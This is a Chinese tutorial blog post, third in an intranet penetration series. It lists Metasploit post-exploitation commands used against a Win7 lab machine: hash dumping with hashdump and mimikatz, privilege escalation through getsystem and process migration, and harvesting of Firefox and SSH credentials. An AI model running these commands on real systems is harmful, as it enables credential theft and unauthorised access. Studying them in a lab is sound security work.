当前位置:网站首页>内网渗透之内网信息收集(三)
内网渗透之内网信息收集(三)
2022-07-06 09:23:00 【不知名白帽】
目录
内网渗透之内网信息收集(四)_不知名白帽的博客-CSDN博客
Metasploit内网信息收集
攻击机 kali 192.168.0.103
靶机 win7 192.168.0.105
07口令破解
use post/windows/gather/hashdump //system权限的meterpreter
set session 1
exploit //结果保存在tmp目录下
use post/windows/gather/smart_hashdump
set session 1
exploit
格式
用户名称:RID:LM-HASH值:NT-HASH值
rid是windows系统账户对应固定的值,类似于linux的uid,gid号,500为administartor,501为guest等。而lm-hash和nt-hash,他们都是对用户密码进行的加密,只不过加密方式不同
hashdump使用的是mimikatz的部分功能
load mimikatz
wdigest、kerberos、msv、ssp、tspkg、livessp
mimikatz_command -h
mimikatz_command -f a:: //查询有哪些模块
mimikatz_command -f samdump::hashes
mimikatz_command -f samdump::bootkey
普通用户提权
getuid
查看用户权限
hashdump
需要管理员的权限
getsystem
只是表面上获取了管理员权限,并没有拥有一些真正的管理员权限
ps
查看进程
getpid
查看当前进程
migrate
进程迁移(把普通用户进程迁移到管理员用户的进程上)
hashdump
08other
确定目标主机是否是虚拟机:
run checkvm
获取目标主机上的软件安装信息:
run post/windows/gather/enum_applications
获取目标主机上最近访问过的文档、链接信息:
run post/windows/gather/dumplinks
查看目标环境信息:
run post/windows/gather/env
查看firefox中存储的账号密码:
run post/windows/gather/firefox_creds
查看ssh账号密码的密文信息、证书信息:
run post/windows/gather/ssh_creds
边栏推荐
- Overview of LNMP architecture and construction of related services
- Strengthen basic learning records
- 《统计学》第八版贾俊平第八章假设检验知识点总结及课后习题答案
- Applet Web Capture -fiddler
- 记一次,修改密码逻辑漏洞实战
- SQL injection
- XSS (cross site scripting attack) for security interview
- XSS之冷门事件
- 图书管理系统
- [err] 1055 - expression 1 of order by clause is not in group by clause MySQL
猜你喜欢
Chain team implementation (C language)
记一次,修改密码逻辑漏洞实战
Detailed explanation of network foundation
HackMyvm靶机系列(3)-visions
《统计学》第八版贾俊平第十三章时间序列分析和预测知识点总结及课后习题答案
JDBC transactions, batch processing, and connection pooling (super detailed)
New version of postman flows [introductory teaching chapter 01 send request]
《统计学》第八版贾俊平第十一章一元线性回归知识点总结及课后习题答案
Hackmyvm target series (3) -visions
Intranet information collection of Intranet penetration (2)
随机推荐
Build domain environment (win)
Interpretation of iterator related "itertools" module usage
Hackmyvm target series (4) -vulny
C language file operation
内网渗透之内网信息收集(二)
HackMyvm靶機系列(3)-visions
xray与burp联动 挖掘
JDBC transactions, batch processing, and connection pooling (super detailed)
Detailed explanation of network foundation routing
《统计学》第八版贾俊平第七章知识点总结及课后习题答案
[err] 1055 - expression 1 of order by clause is not in group by clause MySQL
【educoder数据库实验 索引】
JDBC看这篇就够了
记一次edu,SQL注入实战
7-4 hash table search (PTA program design)
7-7 7003 combination lock (PTA program design)
The United States has repeatedly revealed that the yield of interest rate hiked treasury bonds continued to rise
Intranet information collection of Intranet penetration (2)
外网打点(信息收集)
New version of postman flows [introductory teaching chapter 01 send request]